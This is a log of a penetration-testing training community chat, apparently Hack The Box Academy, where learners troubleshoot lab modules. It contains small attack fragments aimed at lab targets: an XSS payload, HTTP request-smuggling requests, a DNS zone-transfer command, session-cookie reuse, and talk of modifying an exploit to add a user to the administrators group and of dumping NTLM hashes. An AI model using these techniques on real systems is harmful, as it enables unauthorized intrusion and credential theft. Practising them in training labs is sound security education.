#modules

1 messages · Page 99 of 1

fierce island
#

Getting the same error over and over

rapid sparrow
#

For those who stuck in Vulnerable Services, I directly download this ps1 code from exploitdb, and modify it, and add htb-student to administrator group, that's it. NO NEED TO USE STUPID REVERSE SHELL

#

DON"T WASTE YOUR F******** TIME

autumn pilot
#

don't use caps

rapid sparrow
pulsar needle
#

lmao

autumn pilot
#

if you haven't added the required line at the end of the reverse shell, of course it wont work

fierce island
autumn pilot
#

regarding JP, you need to find a working CLSID

fierce island
#

their script GetCLSID's didn't run on the box and the I've tried the first 10 from the Github list

#

So very fustrating

silent scarab
#

hello, i am currently on Attacking Enterprise Networks - Lateral Movement. When trying to add the ilfserveradm user to the local admin group, my bat file being executed by sysaxschedscp doesn't seem to be working, and i am confused why. I read the log file and this is the error i got:

C:\Windows\system32>þn
'þn' is not recognized as an internal or external command,
operable program or batch file.

but the command that i typed into the bat file isn't even remotely close to whats being executed... whats going on?

pine dagger
#

Anyone at all done / on the Skill Assessment for Whitebox Pentesting 101? I just cant get the last piece of this to work to achieve command injection, and would love to chat with someone and get a nudge/bounce ideas off. 🙂

autumn pilot
fierce island
compact musk
#

bro

#

@silent scarab

#

come to dm for a sec 😂

pulsar needle
#

I made a XSS payload, but it wont change the text to test, why?

<p id="msg">text bla bla</p>
<script>document.getElementByID("msg").value="test";</script>
rare topaz
pulsar needle
#

Cross site scripting - Stored XSS

#

I just want to make it so that I can see my own cookie in the list, its not part of the module but I want to see if its possible xd

fierce island
plain coral
plain coral
pulsar needle
#

Aaaa

#

True

#

Thanks

#

It works now

#

👍

fiery berry
#

dm you

heady tusk
#

Hey there,
I'm working on Attacking Common Applications section Attacking Applications Connecting to Services.
I have solved the question but ran into an issue which I hope someone can explain to me:
When I run gdb on the binary, I get different addresses than shown in the example. I'm aware gdb has countless options but I'm not sure what I'd need to change. my best guess would be endianness but that doesn't seem to change anything. Here's what I'm getting:

pulsar needle
#

SO every time the url adds a # in front it is a dom based script?

deep owl
#

hello can anyone help regarding this Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.

#

module: AD enumeration and attacks

#

section: Attacking Domain Trusts - Child -> Parent Trusts - from Linux

unborn shard
# pulsar needle SO every time the url adds a # in front it is a dom based script?

If you mean to ask if every time you see a # in the url that webpage is vulnerable to a dom based XSS, the answer is no because it's not granted that the sink function is not sanitized correctly.. and if it is, you can't do any dom based XSS attack on that parameter
If you mean to ask if there can only be a dom based XSS vulnerability if an url has #, the answer is again no, as it could be vulnerable also to other types of XSS attacks with different parameters

pine dagger
#

Oh finally! Wow that whitebox pentesting skill assessment took me way longer than it should have! Tricky thing!

placid edge
#

'><script>document.getElementByID("msg").value="test";</script>

#

or ">

pulsar needle
#

This input worked

#

Idk if both work xd

placid edge
#

oh no

#

i didnt read your payload properly

#

you are using value

#

as the value you want to get from that id

#

but innerHTML sets that value and is correct

pulsar needle
#

Yeah, thanks for taking your time to try and help (Even though i got the answer above hehe)

tepid pagoda
#

Hello

#

Hello, I have two questions regarding Login Brute Forcing - Service Authentication Brute Forcing. The exercise asks to brute force a password and get the flag. Since I just finished the nmap module I thought it would be interesting to scan the target machine. While during this I couldn't find the 22 tcp port opened, it was always filtered or open|filtered. I tried -sS, sA, sT, sF and sN, changed the source port to 53 and 88, decoys, and --data-length 30. My questions are: Am I supposed to find port 22 open? Is this obsession good or am I just wasting time?

unborn shard
#

You are given a target which is composed of IP and PORT.. that is the port you have to attack, not 22

tepid pagoda
#

Ok, thank you.

south sentinel
#

sorry someone knows if we have a spanish comunnity in hackthebox discord?? or someone speak spanish im really noob

#

i have noob problems with module 23, bypass LFI?? someone can help me please? or say me where i can search in discord channels? im noob

unborn shard
#

I am not aware of any Spanish HTB community, however if you manage to explain your issue in english someway, you could get help here

acoustic owl
analog dock
#

Couldnt you just translate with chatgpt?

jolly basalt
south sentinel
south sentinel
acoustic owl
#

And you are certainly not the only person here from Spain

sharp delta
#

'"

unborn shard
#

Btw I didn't know Wiz Khalifa was Spanish and isn't that confident in his english.. now that's a news for me kek

south sentinel
#

I'm doing module 23, section 1491, LFI Bypass. When I enter the commands in the URL as described in the exercise, the page's response doesn't display the characters next to the image, like in the image shown in the description on HTB Academy. I've tried it on Ubuntu and also on Windows, using Chrome and Firefox, but I'm not getting the expected response. In the first exercise, I have to change: http://159.65.52.96:32032/index.php?language=languages/es.php to: http://159.65.52.96:32032/index.php?language=languages/etc/passwd. The expected result should give me the characters as a response, but in my browser, they don't appear, and the page remains blank. However, in the previous exercise, I managed to reach the flag, but it also didn't display the other characters. In other words, I receive a response, but not all the complete characters as shown in the example image on Academy. I apologize for the lengthy explanation.

foggy jackal
#

hello everyone. i am attempting the AD Enumeration and attacks skill assessment part ii and i would like some hint on question 10. For the user CT***. anyone?

#

Crack this user's password hash and submit the cleartext password as your answer.
someone to help me out please

south sentinel
south sentinel
rare spire
#

Hi,
Could someone help me with the "Working with the Registry" section of the "INTRODUCTION TO WINDOWS COMMAND LINE" module. I'm stuck at the question "A registry entry is made up of two pieces, a 'Key' and ' ' . What is the second piece?"

unborn shard
unborn shard
rare spire
acoustic owl
unborn shard
#

As neither the word "key" is plural

ebon peak
#

Scusate c’è qualcuno che parla Italiano?

rare spire
unborn shard
rare spire
unborn shard
#

Oh

#

Ok

rare spire
#

Yeh I'm also surprise

wraith mural
#

Anyone else have trouble with the TE.CL question in HTTP ATTACKS? I can't even produce a "400 Bad Request" response with these two requests:

POST / HTTP/1.1\r\n
Host: tecl.htb\r\n
Content-Length: 3\r\n
Transfer-Encoding: chunked\r\n
\r\n
5\r\n
HELLO\r\n
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: tecl.htb\r\n
\r\n
naive field
#

questino about sqlmap section, so in this lab there is --prefix option, when do i know what prefix i need to use?

#

like below they gave me the source code but what when its black box and i have no idea like whats running behind

hexed bison
#

hello. I have a question about "Security Monitoring & SIEM Fundamentals" assessment, I don't really understand why the last two questions are not the same answers.

hasty solar
unborn pilot
#

Hello, is there a way to keep the web vnc as full screen ? Each time I go to the next section it goes in a "window" mode ?

autumn pilot
#

just refresh the page of the vnc

unborn pilot
unborn shard
#

It only does that if the new section you change to also has a docker instance.. if the section you change into is not a section with where the instance is required it will not rescale the window

#

And I don't think there is anything you can do to prevent it from rescaling

#

I think it has to do with the way the webpage of the new section you visit requests that instance on the screen, each time you refresh or visit a new section where the docker instance is present, the page has to request the instance to be scaled to the resolution of the box and this affects the other full page too.. as they are virtually the same instance

unborn pilot
#

that's what i taught, it's ok it is just a minor inconvenience thx for the explanation

acoustic owl
fiery berry
small garden
#

Hello, I am really new to this stuff and I need some help setting up my vm and vpn. Could somebody please help me. Thank you !

acoustic owl
vagrant gust
#

need some help with attacking dns

#

ive already got a list of subdomains

#

but whenever i try dig any of them i get nothing back

acoustic owl
vagrant gust
#

attacking common services

acoustic owl
#

okay, what exactly did you try?

vagrant gust
#

i used subbrute and got a list of subdomains

#

i then did dig axfr @subdomain inlanefreight.htb

acoustic owl
vagrant gust
acoustic owl
#

but you have to specify a name server

#
dig AXFR domain.tld @targetip
```
vagrant gust
#

ah

#

i will try that now and let u know

gentle root
#

For Web Skills Assessment - What method do we use to determine how to reset user password? I don't see anything in the module but I could be overlooking something

#

I should have thought of that

#

Wait I'm an idiot

#

you actually helped

#

with that completely useless answer

#

I spent like 1.5 hours yesterday and today without reading the username and password was given to me

#

Thanks

vagrant gust
tawny abyss
hexed bison
tawny abyss
#

I used impacket for it, can someone validate my findings

acoustic owl
tawny abyss
#

Ok, think maybe one overwrote prior restore. Thanks!

tawny abyss
odd smelt
#

Hey ya'll, currently taking Pentest Path, in Footprinting module.

stuck at Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer?

Not sure what to do next.. ran every single cmd in the module.

Any tips?

acoustic owl
odd smelt
#

Thanks @acoustic owl I'll dive a bit deeper.

Will previous modules apply as I navigate thru these boxes? Or will the information mentioned in the module be suffice to solve questions?

odd smelt
#

Also getting NT_STATUS_IO_TIMEOUT or connection disconnected .. is this normal? Sometimes occurs for cmds I've previously ran, am I querying too aggressively or is it part of realistic behavior?

acoustic owl
#

Also getting NT_STATUS_IO_TIMEOUT or connection disconnected .. is this normal? Sometimes occurs for cmds I've previously ran, am I querying too aggressively or is it part of realistic behavior?

#

Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

#

You are looking for another plugin here. Check the wpScan Output. Scan with a Token

foggy jackal
mild cypress
#

n00b question about meterpreter shells, can you not see the output of running something like linpeas.sh inside of them? Do you need to drop into a regular shell first?

proud pine
mild cypress
proud pine
rotund urchin
#

ACL section in the AD Attacks and Enumeration module, can someone help me with the correct query? The one I am running never populates anything? "What is the ObjectAceType of the first right that the forend user has over the GPO Management group?"

mild cypress
proud pine
mild cypress
red current
#

Anyone else run into this issue in the Windows Priv Esc module where in the Pillaging section you add the d cookie for the slack.com website, refresh the page and nothing happens?

proven egret
#

"Introduction to Academy"

Is this not an introduction? I have just spent 15 minutes searching the the archive here and seen not a single response to anyone asking about the non functional internet on the workstation. I'll go one further, and probably show how dumb I am with this but...

WHAT TARGET WEBSITE? Didn't it open the VM I'm supposed to attack from? I have no concept of what the scope is, there's nothing on my desktop that indicates anything other than a blank parrot instance. I have no target.

#

Not understanding anything additional I terminated my instance thinking I'd done something wrong, and now it turns out I absolutley have

#

It took me 20 minutes to shut myself out of the system.

#

I'm completely at a loss as to what I was supposed to do with the VM

pine dagger
#

To explain what's needed, you click to spawn a target. Then when the IP address appears, you click the IP address to copy, and then paste it into a web browser inside the pwnbox (or your own VM). If its pwnbox, the firefox browser is a shortcut on the top bar.

unborn shard
#

Yeah but I think he's claiming that he didn't knew the IP addr is linked to a web server, so he didn't knew he had to put it in the browser

pine dagger
#

Yeah... except the target link literally says "http://<ip>". If they're unaware that it should go into a browser, there's going to be a very steep learning curve.

unborn shard
#

Which, is... somewhat fair given that in the whole section nobody mentions that procedure.. but I mean, you can pretty easily deduce that the target IP is linked to a website from the question itself: What is the proof text displayed in the Target website you browsed? it says "target website you browser".. it should be obvious what you have to do with that target IP addr.. you have to browse it

unborn shard
#

Nah it's not

#

I just checked

#

It's a normal IP address

pine dagger
#

True, but scroll up

#

In the text, under Docker Target

unborn shard
#

That text is straight up wrong.. should be modified.. the image also is wrong, as it shows the target with the "http://" in front, which it does not have.. even though also the text says the target is in the form of: http://<ip>:<port>
Which again is wrong

#

There is no direct indication that says the IP should be put in a browser.. nobody spoon fed him that info, but as I said, I think from the question, it should be logical

proud pine
#

It's not 'wrong' - it's just not hand-holding someone who would have zero experience.

pine dagger
#

Well

#

Actually

unborn shard
#

But I agree on the spoon feeding part

pine dagger
#

Instructions on the page are:

  1. Spawn your target!
  2. Spawn My Workstation if you haven't done so.
    3. From your workstation, open Firefox and browse to the target URL.
  3. Answer the question below.
#

Literally does say (- -)

proud pine
#

This just sounds like concern trolling.

red current
#

Is it possible that Slack patched the vulnerability that allowed you to use a stolen cookie to get a list of credentials? It looks to me like the Pillaging section of the Windows Priv Esc module will need to be updated. This exploit doesn't appear to work anymore.

pine dagger
unborn shard
proven egret
unborn shard
red current
pine dagger
proven egret
#

I never received a prompt providing an IP address to review.

pine dagger
proven egret
#

The only IP address listed on the page is labeled as an example.

red current
pine dagger
proud pine
proven egret
red current
pine dagger
red current
pine dagger
proven egret
#

There was a sub interface with links that allowed me to open the VM in another window

pine dagger
#

Its in the question:
Log in as Grace and find the cookies for the slacktestapp.com website. Use the cookie to log in into slacktestapp.com from a browser within the RDP session and submit the flag.

proven egret
#

But I saw no IP addresses anywhere

red current
proven egret
#

Open in another window, terminate, or restart

#

those were my options

#

Made sure to disable my Ublock

pine dagger
#

Its in the question section under the pwnbox

#

Try a different browser

proven egret
#

I can't now, I made the dumb mistake of terminating my instance

#

¯_(ツ)_/¯

pine dagger
#

You dont need the pwnbox to spawn the targets

proven egret
#

And I have an IP from my host sstem.

#

thank you

pine dagger
red current
pine dagger
#

Well.... that site, is the end goal, not the start

unborn shard
#

Have you added it to your local hosts file?

pine dagger
#

You need to access it inside the RDP as well

red current
#

This entire section referring to using the cookie editor needs to be removed from this section. It's not available anymore.

pine dagger
#

You're right. Looks like the VM got updated. But you don't need the cookie editor really. It just makes it nice and easy. Just press F12, goto the storage tab, cookies, sitename and edit the cookie manually.

red current
pine dagger
#

It does

#

I literally just did it

#

Just double click on the value field.

#

The d cookie already exists

#

You should also try base64 decoding the cookie (not for the exercise, but for the lulz)

red current
#

I really don't get it. I can't edit the value no matter what I try and the d cookie doesn't appear on my end at all.

#

Anything else I can try?

#

Nevermind. I don't know what happened but it suddenly let me edit it and paste in the cookie! Thank you!

red current
# pine dagger It does

Do you know of any hints for the next one? I've tried following the lesson and I get to the point where I create the Restore folder and when open it, there's just a FileToBackup.txt that appears to just be a sample file. Never mind. It's the administrator password I can't seem to get for this one. The previous one was right on the desktop.

rustic sage
#

Would anyone know how to exploit CVE-2016-9565 nagois

novel matrix
rustic sage
#

Because I’m having trouble on htb’s inject machine and wondering if someone could give me pointers

heavy marsh
#

for "Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer. " on the Footprinting SMTP lesson, where in the lesson does it show me how to get the answer.

#

Do I use the VRFY command for each user listed in the wordlist one by one?

#

because that does not seem right

#

everywhere I've searched it's either been people saying to use nmap, which only gives root, admin, administrator, etc as usernames, or to use metasploit.

#

The smpt-user-enum standalone script isn't working either

#

So correct me if I'm wrong, based on my research, it looks like the only way to get the answer is to manually brute force telnet with the usernames in that list, or use metasploit

#

Even though metasploit has not been covered so far in any of the lessons in this learning path.

#

So I just confirmed, the only thing in the lesson that shows you how to find it would be manually entering every username into the telnet with the VRFY command to find it. smtp-user-enum script does not work. The nmap script does not work. Metasploit DOES work, but if you avoid Metasploit that doesn't help.

#

Has anyone found a different way of doing this?

vapid drum
#

Is the skills assessment for the shells & payloads module broken? There's not a web browser in the vm that you can use to browse to the page

steady hawk
vapid drum
steady hawk
#

How would you run something if you didn't have access to a GUI?

vapid drum
#

I found firefox installed but it won't launch lol. Wtf. Is getting a browser up part of the skills assessment or something.

#

Because if so that's pretty silly

steady hawk
#

You can launch firefox by literally typing its name in your terminal

plain coral
#

Does anyone know the differentiation between the run and exploit commands within msfconsole?

vapid drum
#

Tell me again how you can launch it from the command line

plain coral
steady hawk
steady hawk
vapid drum
#

Ah

#

Let's see. Hopefully that fixes it

#

It was driving me nuts lol

steady hawk
#

You could also open chromium from burpsuite xD, i believe it's installed

vapid drum
#

I didn't see it. Maybe I'm just way too tired to really be doing this lol. My ADHD meds wore off hours ago

misty elk
#

Do you get a proof or some type of unofficial 'cert' for completing the Job role paths? (Pentest or bug bounty)

heavy marsh
#

For imap/pop3 footprinting on the question"What is the customized version of the POP3 server?" Dovecot pop3d is not working.

#

That's all nmap gives and there is no information when using openssl

#

Is this another case of stuff not being in the lesson and I have to search for it or am I missing something?

misty elk
#

Your close... Missing the full version

heavy marsh
#

Yeah, there's no full version showing in nmap

#

or the openssl command

#

or the commands you can run from the openssl prompt

#

even with -vvv nothing

gusty zinc
#

Module - Sql Injection
Section - Union Clause

Question -
Connect to the above MySQL server with the 'mysql' tool, and find the number of records returned when doing a 'Union' of all records in the 'employees' table and all records in the 'departments' table.

why is this not giving me the right answer :
select * from employees UNION SELECT null,null,null,null,null,null from departments;

misty elk
#

Check a few more tools PNW.

heavy marsh
#

Found it, I had to put all of the leading info, not just "vX.XXX"

fathom pendant
heavy marsh
#

haha

fathom pendant
#

Lol just as I was nudging

heavy marsh
#

I did the version, then with POP3, then I gave up and started going down the rabbit hole.

#

Thanks guys

#

Where do I even start for the admin email address?

fathom pendant
#

I linked a site to useful imap commands a while back

heavy marsh
#

I'm using the ones on the lesson mainly

fathom pendant
#

Yeah but you're not gonna get all the info

heavy marsh
#

How do I even know I should use imaps and not pop3

#

?

#

Neither imaps or pop3 are showing any messages

fathom pendant
heavy marsh
#

So is the fact that there are 0 emails normal?

fathom pendant
fathom pendant
#

You're not in the right email folder if that's the case

heavy marsh
#

I see

#

I didn't realize there were multiple folders

fathom pendant
#

That's why the list command exists

heavy marsh
#

Thanks for all of the help. I wish the lessons linked to more resources.

#

Are there walkthroughs of the lessons for those of us that don't want to bother the helpful folks at discord every time documentation is lacking?

fathom pendant
misty elk
#

I would complain but 96.5% of the time I'm being an idiot and/or missing something obvious.

heavy marsh
#

I feel that, it's happened to me more than I care to admit

#

Still, when you spend 3 hours troubleshooting with the documentation given only to find out you needed to go to hacktricks or pentestmonkey it kind of makes you doubt the platform more.

thorn urchin
heavy marsh
thorn urchin
#

Usually the person being dumb about the lesson. A couple of notable exceptions however.

#

Being dumb might be too harsh, lacking required prerequisites is more typical

heavy marsh
#

For example IMAP/POP3 footprinting: I'm trying to figure out how the lesson and information given would lead me to an admin email address

#

and access to emails/flag

thorn urchin
#

The rule of thumb here is that you have to be comfortable searching documentation of a web application service youve never seen in order to discover how it can be leveraged properly.

Anything within that realm or approximate equivalent can be pretty fair game to me.

heavy marsh
#

I understand, but I don't see where that is outlined in the curriculum

thorn urchin
#

It isnt. thats the point.

heavy marsh
#

If I were to take a course in "The Afterlife" I would expect the teacher to have me read "Dante's Inferno" if it was part of his curriculum

thorn urchin
#

This isnt english literature, this is hacking

#

You have to have that spark of curiosity in you

heavy marsh
#

Or at least hint that the material was included

thorn urchin
#

no course can teach that, it can only encourage such behavior

thorn urchin
# heavy marsh Or at least hint that the material was included

I mean the module did. It provided some information about the service, with some hints about how to interact with it and then instructed you to figure out how to interact with it more on your own. and submitted flags as proof of this accomplishment

devout torrent
thorn urchin
#

I totally understand the frustration of tackling a technology youre unfamiliar with and trying to get it to do what you want it to do. But the stubbornness and curiosity to make it happen and the enjoyment of it finally working is the very heart and soul of hacking.

#

If that sensation and frustration bothers you or doesnt feel worth it, then perhaps there are other aspects of security or something youd be more suited for.

heavy marsh
#

No, I'm determined, just expected a more comprehensive and detailed curriculum for the price I pay. That being said I appreciate the help I've received here so far.

#

Came here with a decent background and having completed THM Offensive Pentesting, just looking for the next step.

fathom pendant
#

I mean the short answer is using an email client

heavy marsh
#

So anyway for IMAP/POP3 "What is the admin email address? " question, if I've tried all commands, what's next?

#

one reference is asking me to "tag <command>" where HTB is asking me to "1 <command>"

fathom pendant
#

Do you mean all commands from the module?

#

Or what I linked

heavy marsh
#

and the links provided

#

besides logout

thorn urchin
fathom pendant
#

Well if you read the email you'll get all the relevant info

heavy marsh
#

I haven't read the email yet.

#

I can't even access an email

modern falcon
#

Just curious, how many active boxes do i have to pawned to get to hacker rank?

fathom pendant
#

Then start with getting to the right email folder lol

fathom pendant
heavy marsh
#

yeah, did that, got 4 results

fathom pendant
#

Alright then start there

#

Like you're complaining about a trivial issue

heavy marsh
#

no matter what inbox I go to there are no emails or anything

fathom pendant
#

Then you're doing something wrong

rare topaz
#

Lmao

heavy marsh
#

so what would you reccomend?

fathom pendant
proud pine
fathom pendant
#

There's a reason I'm saying imap

heavy marsh
#

yeah, I'm working only in imap

#

pop3 made that clear pretty quick

#

otherwise I would have been way further down the rabbit hole

#

so I tried to fetch headers

#

fetch messages

fathom pendant
#

Double check that all branches you're looking at are empty

heavy marsh
#

pretty much went through every command in the two links and the HTB lesson

fathom pendant
#

You can't fetch a header for an email that doesn't exist

#

Are you actually selecting the folder

#

Like I said there has to be something you're doing wrong lol

thorn urchin
#

show terminal output of your attempt to list emails from each of the folders you found.

heavy marsh
#

alright starting from scratch

thorn urchin
#

Cause I think were in devil in the details territory

#

and if were not. details will at least reveal where the misconception is

heavy marsh
#

LOGIN ***** *****

#

with username password, not showing them for spoilers

#

then
1 LIST "" *

thorn urchin
#

use triple backticks at the beginning and end to wrap your terminal output

so it looks like this
heavy marsh
#

test```

#

nope

#

didn't work

#

test

#

there we go

#

my bad

#

okay so

#

1 LIST "" *

#

then

#

1 SELECT DEV.DEPARTMENT.INT

#

I've tried all of the tag STATUS INBOX (MESSAGES)

#

and those types of commands with no luck

fathom pendant
thorn urchin
#

I also wanted to see direct terminal output of exactly what you typed in AND the response you got back.

#

Ctrl-C Ctrl-V

heavy marsh
fathom pendant
proud pine
#

You guys have been trying for 90+ minutes now. I don't think it's going to work out lol

thorn urchin
thorn urchin
fathom pendant
#

And without knowing what the command you're utilizing is doing

heavy marsh
#

I can't copy the screenshot in

thorn urchin
#

dont need a screenshot

proud pine
#

It's like watching sisyphus.

thorn urchin
#

just copy paste your terminal and wrap it in backticks

fathom pendant
heavy marsh
#

hit 2000 character limit

fathom pendant
#

Do it one command at a time

thorn urchin
#

cut it down to the relevant parts where you try to list emails

fathom pendant
thorn urchin
#

yeah bot yeet

#

verify your account

heavy marsh
#

Verify?

thorn urchin
#

so you dont have the boring white name

heavy marsh
#

I am signed up already

thorn urchin
#

yeah but youre not verified here on the discord

#

so you have restricted permissions n stuff

heavy marsh
#

Did that not come with the year long membership?

thorn urchin
#

Bro you have to verify your account

heavy marsh
#

Okay

thorn urchin
#

Discord doesnt magically know who you are

heavy marsh
#

I'm used to forums

#

this is the second time I've used Discord

#

or at least the second community

thorn urchin
#

No worries, basically theres no way for HTB to auto link your discord and your HTB accounts

fathom pendant
#

^

thorn urchin
#

so you gotta follow some instructions from the bot to do so

#

It helps mitigate spammers n such

heavy marsh
#

word

#

I need to take a break

rare topaz
#

At this point bro should just contact support

#

Clearly there is a severe misunderstanding somewhere

thorn urchin
#

Hed have to verify his account for that

fathom pendant
#

^

proud pine
fathom pendant
#

It's how they offer the discord tutoring

fathom pendant
thorn urchin
#

Im trying to be nicer to a fellow PNW peep

rare topaz
rare topaz
thorn urchin
#

Pacific Northwest

rare topaz
#

Ah

thorn urchin
#

Washington/Idaho/Oregon

heavy marsh
#

I might hit up support, we'll see

thorn urchin
#

though we only grudgingly accept Idaho

rare topaz
thorn urchin
#

inb4 he says hes from idaho

rare topaz
#

Bro from Ohio

thorn urchin
#

if an ohio person is using the PNW tag we about to throw hands

heavy marsh
#

I don't consider Idaho in the PNW

#

They're like a border to Montana for Washington

#

Idaho is Idaho

thorn urchin
#

yeah but 'officially' theyre PNW too

heavy marsh
misty elk
#

Enterprise Academy doesn't sync with regular academy hmmm 😟

heavy marsh
#

I verified my account

sonic forge
#

test

heavy marsh
sonic forge
#

noice just made hacker

heavy marsh
#

Congrats!

sonic forge
#

thank you kindly

heavy marsh
#

Know anything about IMAP footprinting?

wild folio
#

Are you on the footprinting lab - hard?

heavy marsh
#

no, IMAP/POP3

#

question is "What is the admin email address?"

wild folio
#

how far did you get

heavy marsh
#

I'm authenticated and have found the directories with * LIST

#

other than that, none of the directories have any emails

#

I was trying to use the command :1 FETCH <ID> all Retrieves data associated with a message in the mailbox.

#

but there's no <ID>

#

Someone gave me a link to some other resources and none of those commands work either.

wild folio
#

once you authenticate to the imap server, you use the credentials provided to actually interact with the IMAP services. From there give this a read.

analog dock
heavy marsh
#

Does it matter or does it have to be homogenous among each session?

wild folio
#

I'm interested in that answer as well. I just know it works for me.

#

I pulled those last two questions just now.

heavy marsh
#

Cool, thanks, will work more

#

This is what I got

wild folio
#

'''tag FETCH 1 RFC822'''

heavy marsh
wild folio
#

if I can find a link to it I'll post. Should have found that first...

wild folio
#

Though I would save it. I've used it a few times already.

heavy marsh
#

Weird, that works for the question in the last section of the module, but the one before that I still can't get

wild folio
#

"TAG" is an identifier for the command sent from the client to the server. It can be any string but it should be unique for every command within a single connection. The server will use the same tag in its response to indicate which command it's responding to.

"FETCH" is the command itself. It tells the server to retrieve specific parts of specific messages.

"1" is the message sequence number of the email message that you want to retrieve. So in this case, it's the first message in the mailbox.

"RFC822" is a message data item identifier. When used in a FETCH command, it tells the server to return the full, raw source of the email message, including the header, body, and any attachments, in the format specified by RFC 822 (a standard for the format of ARPA Internet text messages).

#

you don't get a "from: CTO" in your output?

heavy marsh
#

Very informative!

#

It's almost like that should have been in the module!

#

So how was I supposed to find the admin email?

wild folio
#

you don't get a "from: CTO" in your output?

heavy marsh
#

No. I got it!

#

Thank you!

#

Can you tell me please how you came to this conclusion?!

analog dock
wild folio
#

I struggled here as well and kinda just frankensteined a bunch of stuff together.

#

Trial by fire..

heavy marsh
#

Same here. Signed up for a comprehensive, detailed curriculum. Sorry you had to frankenstein. Thank you for the assist, I appreciate it!

#

I still don't understand those commands though

analog dock
heavy marsh
steady hawk
#

I would just use Evolution, it's good to learn the CLI, but I've yet to encounter a situation were I've been forced to use it.

wild folio
#

evolution?

steady hawk
#

GUI for imap

wild folio
#

oh nice

heavy marsh
analog dock
#

F FETCH 1 RFC822

analog dock
heavy marsh
#

blueteamTHIS got me through that

#

I still don't know why

#

just that it works

analog dock
#

Did you try it?

heavy marsh
#

yeah, I cleared the lesson with blueteamTHIS's help

analog dock
heavy marsh
#

the commands are just not clear

wild folio
#

yeah?

analog dock
#

They are very clear

wild folio
#

"TAG" is an identifier for the command sent from the client to the server. It can be any string but it should be unique for every command within a single connection.

#

Basically it's just placing a label on the command you're about to use. (FETCH)

#

For client/server communication

#

It doesn't have to be "tag". It could be "yomam" FETCH

heavy marsh
#

Got it, just having trouble reconciling that with the lesson material

#

It wasn't anywhere in the module

analog dock
#

Correct, but you had the links already

heavy marsh
#

Trying to find where I missed the mark

#

Well when the links didn't work I went back

analog dock
#

I agree that they should provide those links or better explanation in the section

heavy marsh
#

So if I find myself lost again I should seek outside assistance from resources other than the module?

#

Or past modules?

analog dock
#

Googling never hurts

#

And you’ll find that they refer back to past modules sometimes yeah

wild folio
#

Having a chatgpt tab open doesn't hurt either.

heavy marsh
#

Just frustrating, I like getting quality instruction when I pay for it

analog dock
#

Going back to footprinting module sometimes for syntax

heavy marsh
#

You guys are top notch though

#

HTB should be paying you

wild folio
#

maybe 0x56 but naaah I'm around the same level as you lol

analog dock
#

They provide quality instructions, especially for the price you pay. Some modules could be made a bit better though I agree

heavy marsh
#

We'll get there blueteamTHIS

analog dock
#

But they’re constantly updating

wild folio
#

I noticed that.

#

Pretty cool to see.

heavy marsh
#

Yeah, much better than tryhackme

#

so far

analog dock
#

I still have the ptp course from elearnsecurity, that’s the course for eCPPTv2, which was like 1500$. The explanation and detail in academy is better than that course imo

#

That’s what I mean with “especially for the price you pay”

#

It’s 8$ a month for a student and like 100$ to unlock all modules for others, that’s insanely cheap for the information provided

heavy marsh
analog dock
#

The struggle is what helps me learn personally, so try to embrace it instead of getting frustrated

vital adder
heavy marsh
analog dock
vital adder
#

do you at least get a cer attempt with the course?

analog dock
#

Ive yet to take the exam though

vital adder
analog dock
#

You won’t get a sans cert at that price though

#

Id recommend getting an offsec cert instead though

#

And I wouldn’t recommend elearn courses to anyone anymore

#

INE ruined that

vital adder
analog dock
vital adder
wild folio
#

GPEN was 9k for just the course

analog dock
wild folio
#

$8275*

analog dock
vital adder
vital adder
#

i did look into getting GPEN without the course and just with the academy content

#

but not sure if i want to yeeted about 1K out of the windows that way

wild folio
#

and yeet you will

#

lol

vital adder
wild folio
#

haha I've been doing the course work and haven't bought the cert yet either cause I'm scuured

#

err the voucher.

scenic oar
#

hi everyone, i'm new in cybersecurity and i'm blocked at "linux fundamentals" in the section "System information", i can't login to the machine with SSH i don't know why

#

when it asks me to type the password i type it and it says "permission denied"

valid cipher
#

vpn

scenic oar
#

okay it's good i found !

placid quest
#

@scenic oar download the VPN and use sudo openvpn file name

rustic sage
#

Hello colleagues I want to ask if this for loop is structured for this question. module BashScripting

#

Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.

#

for i in {0..27}
do
var=$(echo $var | base64)
done
salt=$(echo $var | wc -c)

#

It would be of great help if you could indicate to me this structured in the way you are indicating in the question but I see that I am missing something because I have found the flag.

#

And can you recommend me a bashScripting course if someone can tell me where I can get it to go deeper into this topic that is of utmost importance.

drowsy bane
#

Has anyone done the new Linux privilege escalation module yet? I’m struggling with the escape restricted shell bit

cinder mortar
#

For report writing, do we have to record every command? Like even for file transfers, what to run on target and attack machine

valid cipher
#

Just discovered the tracert tool, and I'm curious why my packets go through 3 private IPs before entering the internet. The first one is my router, but not sure what the others are

acoustic owl
pine dagger
gaunt monolith
#

Hi who can Help me in pivoting module in meterpreter tunneling and port forwarding I have Syntax error .. when write run autoroute -p Ive got 3 IP address so how can write it in solve box I tried ||172.16.5.0/172.16.4.0|| but nothing worked

fiery berry
#

otherwise you can dm me

mighty wharf
#

Hey guys I'm on the medium assessment for password attacks and I'm trying to password spray smb for some creds but crackmap is saying all passwords are good. Dose anyone know how to fix this, thinks its some sort of bug saw it is the escape video ipp done recently.

livid hull
#

Good day everyone, am new year. I am also new to Cyber Security and heard about harkthebox. I have followed the instructions and have 3 active connections, my machine is online and gave an IP address but when I ping the machine it's says not reachable, I have repeated the process over 10x, shut down and reported by system several times, delete files and reinstalled vpn, I still cannot get a feedback from the machine when I ping it. Please can someone assist me. Thank you in advance

vital adder
vital adder
mighty wharf
livid hull
vital adder
random cliff
#

Hi Guys! Can you help me with the Linux Priv esc Dirty Cow section? (Escalate privileges using the same Kernel exploit. Submit the contents of the flag.txt file in the /root/kernel_exploit directory.) I ran the exploit but the user firefart was not created and I could not escalate. Thanks!!

random cliff
vivid igloo
#

ayo

#

am so stuck here

#

Leverage SeDebugPrivilege rights and obtain the NTLM password hash for the sccm_svc account.

#

they want me to assign privs to this user(Debug programs)

fallow tundra
#

Hi, i think here is a dead link in the Footprinting Module > Linux Remote Management Protocols > Pluggable Authentication Modules (PAM)

vivid igloo
#

but i dont have privs to even open Local Policies\User Rights Assignment

#

@acoustic owl

zinc sentinel
vivid igloo
#

i haven't

zinc sentinel
#

used the procdump.exe?

#

opening an elevated shell?

vivid igloo
# zinc sentinel used the procdump.exe?

